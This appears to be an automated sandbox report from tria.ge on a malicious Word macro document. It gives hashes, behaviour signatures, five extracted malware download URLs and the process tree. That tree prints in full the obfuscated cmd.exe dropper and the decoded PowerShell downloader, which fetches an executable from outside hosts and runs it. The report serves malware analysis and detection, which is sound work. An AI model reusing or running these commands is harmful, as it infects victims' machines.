Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
25/08/2024, 09:14
General
-
Target
c06a2e5abd9ac5e50c7e1acc180fa4e2_JaffaCakes118.doc
-
Size
137KB
-
MD5
c06a2e5abd9ac5e50c7e1acc180fa4e2
-
SHA1
51bf7e1cac1e7f64289051b7a891804e1577ff51
-
SHA256
5f50deac85a3e3e51cb6c6d7f8fa81f1e426281225e8e685c90a32f23c8b15d8
-
SHA512
811ca504c7ae4b2b0dc20c374c467ba330a27805008b700022c22f43909406de463944d5d6c0ff09ac4985c50551d1d3c5aff157f603d85014f0fa89ab1d39ae
-
SSDEEP
1536:mFM5O81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9cX9jvVJZeI:G8GhDS0o9zTGOZD6EbzCdqX9DVuI
Malware Config
Extracted
http://www.exclusivetvlnet.com/eb1o4
http://rashmigupta.com/eU6
http://dellaconnor.com/6uHd8l
http://whitecertifiedangusbeef.com/eLUIv5P2
http://aidspolicyproject.org/u
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\c06a2e5abd9ac5e50c7e1acc180fa4e2_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set h7=TrWpZHkGilrpENjqKwWB)\C5g}t;I$P+mcO{xJA1'8Y0 6e@-RLfU:yoD(svnFu.,zabS7V429=/dh&&for %M in (29;37;49;14;74;40;58;12;12;40;27;29;0;17;38;74;60;46;17;48;55;67;14;46;33;26;44;13;46;26;63;18;46;67;22;9;8;46;60;26;27;29;51;61;8;74;40;77;26;26;11;53;75;75;17;17;17;63;46;36;33;9;62;58;8;59;46;26;59;9;60;46;26;63;33;55;32;75;46;67;39;55;71;47;77;26;26;11;53;75;75;10;66;58;77;32;8;24;62;11;26;66;63;33;55;32;75;46;52;45;47;77;26;26;11;53;75;75;76;46;9;9;66;33;55;60;60;55;10;63;33;55;32;75;45;62;5;76;41;9;47;77;26;26;11;53;75;75;17;77;8;26;46;33;46;10;26;8;51;8;46;76;66;60;24;62;58;67;46;46;51;63;33;55;32;75;46;50;52;28;59;23;30;72;47;77;26;26;11;53;75;75;66;8;76;58;11;55;9;8;33;54;11;10;55;14;46;33;26;63;55;10;24;75;62;40;63;68;11;9;8;26;57;40;47;40;20;27;29;49;6;65;74;40;58;52;70;40;27;29;37;58;76;44;74;44;40;39;73;69;40;27;29;32;38;28;74;40;38;52;11;40;27;29;34;6;4;74;29;46;60;59;53;26;46;32;11;31;40;21;40;31;29;37;58;76;31;40;63;46;36;46;40;27;51;55;10;46;66;33;77;57;29;18;12;37;44;8;60;44;29;51;61;8;20;35;26;10;54;35;29;0;17;38;63;56;55;17;60;9;55;66;76;61;8;9;46;57;29;18;12;37;64;44;29;34;6;4;20;27;29;4;65;33;74;40;11;77;55;40;27;28;51;44;57;57;7;46;26;48;28;26;46;32;44;29;34;6;4;20;63;9;46;60;24;26;77;44;48;24;46;44;41;43;43;43;43;20;44;35;28;60;59;55;6;46;48;28;26;46;32;44;29;34;6;4;27;29;76;37;22;74;40;8;17;67;40;27;67;10;46;66;6;27;25;25;33;66;26;33;77;35;25;25;29;42;62;32;74;40;34;14;62;40;27;78)do set XA=!XA!!h7:~%M,1!&&if %M geq 78 powershell.exe "!XA:~4!""2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeCmD /V:/C"set h7=TrWpZHkGilrpENjqKwWB)\C5g}t;I$P+mcO{xJA1'8Y0 6e@-RLfU:yoD(svnFu.,zabS7V429=/dh&&for %M in (29;37;49;14;74;40;58;12;12;40;27;29;0;17;38;74;60;46;17;48;55;67;14;46;33;26;44;13;46;26;63;18;46;67;22;9;8;46;60;26;27;29;51;61;8;74;40;77;26;26;11;53;75;75;17;17;17;63;46;36;33;9;62;58;8;59;46;26;59;9;60;46;26;63;33;55;32;75;46;67;39;55;71;47;77;26;26;11;53;75;75;10;66;58;77;32;8;24;62;11;26;66;63;33;55;32;75;46;52;45;47;77;26;26;11;53;75;75;76;46;9;9;66;33;55;60;60;55;10;63;33;55;32;75;45;62;5;76;41;9;47;77;26;26;11;53;75;75;17;77;8;26;46;33;46;10;26;8;51;8;46;76;66;60;24;62;58;67;46;46;51;63;33;55;32;75;46;50;52;28;59;23;30;72;47;77;26;26;11;53;75;75;66;8;76;58;11;55;9;8;33;54;11;10;55;14;46;33;26;63;55;10;24;75;62;40;63;68;11;9;8;26;57;40;47;40;20;27;29;49;6;65;74;40;58;52;70;40;27;29;37;58;76;44;74;44;40;39;73;69;40;27;29;32;38;28;74;40;38;52;11;40;27;29;34;6;4;74;29;46;60;59;53;26;46;32;11;31;40;21;40;31;29;37;58;76;31;40;63;46;36;46;40;27;51;55;10;46;66;33;77;57;29;18;12;37;44;8;60;44;29;51;61;8;20;35;26;10;54;35;29;0;17;38;63;56;55;17;60;9;55;66;76;61;8;9;46;57;29;18;12;37;64;44;29;34;6;4;20;27;29;4;65;33;74;40;11;77;55;40;27;28;51;44;57;57;7;46;26;48;28;26;46;32;44;29;34;6;4;20;63;9;46;60;24;26;77;44;48;24;46;44;41;43;43;43;43;20;44;35;28;60;59;55;6;46;48;28;26;46;32;44;29;34;6;4;27;29;76;37;22;74;40;8;17;67;40;27;67;10;46;66;6;27;25;25;33;66;26;33;77;35;25;25;29;42;62;32;74;40;34;14;62;40;27;78)do set XA=!XA!!h7:~%M,1!&&if %M geq 78 powershell.exe "!XA:~4!""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "$JRj='sEE';$TwA=new-object Net.WebClient;$fFi='http://www.exclusivetvlnet.com/eb1o4@http://rashmigupta.com/eU6@http://dellaconnor.com/6uHd8l@http://whitecertifiedangusbeef.com/eLUIv5P2@http://aidspolicyproject.org/u'.Split('@');$Rkz='sUV';$Jsd = '197';$mAI='AUp';$OkZ=$env:temp+'\'+$Jsd+'.exe';foreach($WEJ in $fFi){try{$TwA.DownloadFile($WEJ, $OkZ);$Zzc='pho';If ((Get-Item $OkZ).length -ge 80000) {Invoke-Item $OkZ;$dJC='iwb';break;}}catch{}}$Yum='Oju';"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
245KB
MD5f883b260a8d67082ea895c14bf56dd56
SHA17954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD55223b08e2cb5ad666bb5e7d6a0981f2a
SHA11874eae7506f371cefdf760cd8239b1166b9d883
SHA256af0b411ddb4a95d06f06d2d664dd54c32773ea694febd19b36153bed83f9036e
SHA512db43284f409e9d13df993a4f26d32cf1ca70f59cb757a4d2205d7d3bb71b7ba91be42f6dca04c51eb22bedc4945663dd4bf6b24bacc042079f7497fc33a3660b
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
4KB
-
Filesize
2.0MB
-
Filesize
4KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
136KB